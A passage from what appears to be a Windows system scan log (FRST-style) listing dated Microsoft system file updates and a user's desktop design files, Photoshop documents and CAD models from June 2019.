2018-09-09 17:16 - 000126064 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll 2019-06-15 16:12 - 2018-09-09 17:16 - 000035440 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe 2019-06-15 16:12 - 2018-08-29 17:56 - 000780376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationNative_v0300.dll 2019-06-15 16:12 - 2018-08-29 17:56 - 000104560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll 2019-06-15 16:12 - 2018-08-29 17:56 - 000036896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe 2019-06-15 15:54 - 2019-06-15 15:54 - 000000000 ____D C:\Users\Bach\AppData\Roaming\anyburn 2019-06-15 15:51 - 2019-06-19 20:27 - 000000000 ____D C:\ProgramData\AVAST Software 2019-06-14 15:24 - 2019-06-14 15:24 - 002516767 _____ C:\Users\Bach\Desktop\AI3M_bazalt piramid.gcode 2019-06-13 22:15 - 2019-06-13 22:15 - 000390548 _____ C:\Users\Bach\Desktop\iç bükey project.bip 2019-06-13 15:05 - 2019-06-13 15:05 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign8e4e8ed2f9bd7fb1 2019-06-13 15:04 - 2019-06-13 15:04 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign9d8644eed3c17a2e 2019-06-13 15:04 - 2019-06-13 15:04 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign1e391d38458761b3 2019-06-13 15:02 - 2019-06-13 15:02 - 104711608 _____ C:\Users\Bach\Desktop\masklıkızek.psd1 2019-06-13 15:02 - 2019-05-29 14:03 - 1116961641 _____ C:\Users\Bach\Desktop\BASKI1.psd 2019-06-13 15:00 - 2019-06-13 15:00 - 251994986 _____ C:\Users\Bach\Desktop\masklıkızek.psd 2019-06-13 14:49 - 2019-06-13 14:49 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign45a2d27861fe19a2 2019-06-13 13:55 - 2019-06-13 13:55 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsignf461cb482d91ffe6 2019-06-13 13:51 - 2019-06-13 13:51 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsignfed31823a026a38d 2019-06-13 13:51 - 2019-06-13 13:51 - 000000000 ____D C:\Users\Bach\AppData\Local\Tempzxpsign50eced62f6ac0e15 2019-06-13 12:46 - 2019-06-13 12:46 - 001993528 _____ (Microsoft Corporation) C:\Windows\system32\mcupdate_GenuineIntel.dll 2019-06-12 21:42 - 2019-06-12 21:43 - 000050184 _____ C:\Users\Bach\Desktop\torna-igs.igs 2019-06-12 21:42 - 2019-06-12 21:42 - 000078650 _____ C:\Users\Bach\Desktop\torna.stp 2019-06-12 18:45 - 2019-06-16 14:30 - 015204460 _____ C:\Users\Bach\Desktop\torna üretim örnek.3dm 2019-06-12 18:45 - 2019-06-14 18:17 - 015194151 _____ C:\Users\Bach\Desktop\torna üretim örnek.3dmbak 2019-06-12 18:41 - 2019-06-12 18:41 - 000104039 _____ C:\Users\Bach\Desktop\torna üretim.x_t 2019-06-12 16:07 - 2019-06-12 16:07 - 005735790 _____ C:\Users\Bach\Desktop\sipariş uçlar.pdf 2019-06-12 12:03 - 2019-06-12 12:03 - 026808320 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 023438336 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 022114960 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 020816384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 018999296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 017484800 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 015221248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 012869120 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 012162048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 009682744 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 007884288 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 007875072 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 007724992 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 007687576 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 007645392 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 006926336 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 006547144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 006441472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 006309256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 006068224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 005764608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 005588184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 005297152 _____ (Microsoft Corporation) C:\Windows\system32\cdp.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 005210904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepository.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 005112792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 005086208 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 004997096 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepository.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 004883968 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 004661760 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 004627456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 004588544 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 003983872 _____ (Microsoft Corporation) C:\Windows\system32\EdgeContent.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 003906560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 003743744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 003637248 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 003426816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdp.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 003385344 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 003363640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 003344896 _____ (Microsoft Corporation) C:\Windows\system32\NetworkMobileSettings.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 003270144 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 003091968 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002999808 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002928640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002926096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 002777736 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002707968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 002690048 _____ (Microsoft Corporation) C:\Windows\system32\WebRuntimeManager.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002653696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002638336 _____ (Microsoft Corporation) C:\Windows\system32\smartscreen.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 002627600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 002469440 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002422272 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 002323696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002276192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002189312 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.onecore.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002096128 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2019-06-12 12:03 - 2019-06-12 12:03 - 002085168 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 002017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2019-06-12 12:03 - 2019-06-12 12:03 - 001929216 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001903616 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001899160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001860608 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001860096 ____R (The ICU Project) C:\Windows\system32\icuin.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001761280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001750016 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001701888 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001700312 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2019-06-12 12:03 - 2019-06-12 12:03 - 001670840 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001644544 _____ (Microsoft Corporation) C:\Windows\system32\wpncore.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001618944 ____R (The ICU Project) C:\Windows\SysWOW64\icuin.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001616384 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001605120 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentExtensions.desktop.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001485312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001483872 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001471040 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 001466496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32full.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001462272 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001387520 _____ (Microsoft Corporation) C:\Windows\system32\bcastdvruserservice.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001342904 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2019-06-12 12:03 - 2019-06-12 12:03 - 001331536 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001315328 _____ (Microsoft Corporation) C:\Windows\system32\wpnapps.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001313792 _____ (Microsoft Corporation) C:\Windows\system32\NotificationController.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjet40.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001309696 _____ (Microsoft Corporation) C:\Windows\system32\webplatstorageserver.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001298952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001260048 _____ (Microsoft Corporation) C:\Windows\system32\SecConfig.efi 2019-06-12 12:03 - 2019-06-12 12:03 - 001256448 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001255936 _____ (Microsoft Corporation) C:\Windows\system32\usermgr.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001254912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001253688 _____ (Microsoft Corporation) C:\Windows\system32\hvix64.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 001229824 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 001223168 _____ (Microsoft Corporation) C:\Windows\system32\HoloSI.PCShell.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001219424 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryPS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001180184 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 001098136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001072640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001054712 _____ (Microsoft Corporation) C:\Windows\system32\ApplyTrustOffline.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 001048592 _____ (Microsoft Corporation) C:\Windows\system32\hvax64.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 001032704 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001005056 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 001000448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpnapps.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000998912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000972288 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000971776 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000927744 _____ (Microsoft Corporation) C:\Windows\system32\assignedaccessmanagersvc.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000924160 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000912384 _____ (Microsoft Corporation) C:\Windows\system32\EdgeManager.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000898048 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000887808 _____ (Microsoft Corporation) C:\Windows\system32\usocore.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000872448 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000863544 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000853504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000850760 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webplatstorageserver.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000804352 _____ (Microsoft Corporation) C:\Windows\system32\ieproxy.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000791040 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000787456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000773632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000769536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000758688 _____ (Microsoft Corporation) C:\Windows\system32\tcblaunch.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000756736 _____ (Microsoft Corporation) C:\Windows\system32\updatehandlers.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000752144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000749568 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000735232 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000730592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000699392 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Language.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000692736 _____ (Microsoft Corporation) C:\Windows\system32\aadcloudap.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000679424 _____ (Microsoft Corporation) C:\Windows\system32\AppReadiness.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000676048 _____ (Microsoft Corporation) C:\Windows\system32\StateRepository.Core.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000669184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000667136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fveapi.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000663552 _____ (Microsoft Corporation) C:\Windows\system32\PsmServiceExtHost.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000663040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EdgeManager.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000651576 _____ (Microsoft Corporation) C:\Windows\system32\securekernel.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000651064 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000618496 _____ (Microsoft Corporation) C:\Windows\system32\AssignedAccessManager.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000615440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000604344 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000594944 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000586040 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000570368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000555232 _____ (Microsoft Corporation) C:\Windows\system32\AppResolver.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000553664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepositoryPS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000543744 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000540720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StateRepository.Core.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000532992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000531968 _____ (Microsoft Corporation) C:\Windows\system32\sppcext.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000522752 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000515152 _____ (Microsoft Corporation) C:\Windows\system32\policymanager.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000513904 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000506192 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000496128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sppcext.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000495616 _____ (Microsoft Corporation) C:\Windows\system32\DDDS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000478720 _____ (Microsoft Corporation) C:\Windows\system32\taskcomp.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000476160 _____ (Microsoft Corporation) C:\Windows\system32\wuuhext.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000474936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS 2019-06-12 12:03 - 2019-06-12 12:03 - 000462136 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000451104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\policymanager.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000430904 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000427688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppResolver.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000424960 _____ (Microsoft Corporation) C:\Windows\system32\SDDS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000419368 _____ (Microsoft Corporation) C:\Windows\system32\wmicmiplugin.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000404792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\clfs.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000398848 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000398208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000389120 _____ (Microsoft Corporation) C:\Windows\system32\BingASDS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000386576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000375544 _____ (Microsoft Corporation) C:\Windows\system32\MusNotifyIcon.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000375296 _____ (Microsoft Corporation) C:\Windows\system32\esentutl.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000370688 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000365056 _____ (Microsoft Corporation) C:\Windows\system32\NotificationControllerPS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000362496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskcomp.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000359936 _____ (Microsoft Corporation) C:\Windows\system32\DeviceEnroller.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000353280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000351744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieproxy.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000351232 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicSvc.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000345600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msexcl40.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000340480 _____ (Microsoft Corporation) C:\Windows\system32\credprovhost.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000331264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esentutl.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fveapibase.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000292664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msiscsi.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000287912 _____ (Microsoft Corporation) C:\Windows\system32\SIHClient.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000282424 _____ (Microsoft Corporation) C:\Windows\system32\browserbroker.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000280576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credprovhost.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000279040 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000275456 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000262160 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000257024 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicCapsule.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000247608 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthAgent.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000246784 _____ (Microsoft Corporation) C:\Windows\system32\mdmregistration.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000244224 _____ (Microsoft Corporation) C:\Windows\system32\JpnServiceDS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msltus40.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000240128 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winnat.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000237056 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000228352 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2019-06-12 12:03 - 2019-06-12 12:03 - 000218624 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000201728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mdmregistration.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000196920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spacedump.sys 2019-06-12 12:03 - 2019-06-12 12:03 - 000195072 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryUpgrade.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000177152 _____ (Microsoft Corporation) C:\Windows\system32\spacebridge.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000177152 _____ (Microsoft Corporation) C:\Windows\system32\LanguageComponentsInstaller.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000166400 _____ (Microsoft Corporation) C:\Windows\system32\FilterDS.dll 2019-06-12 12:03 - 2019-06-12 12:03 - 000165376 _____ (Microsoft Corporation) 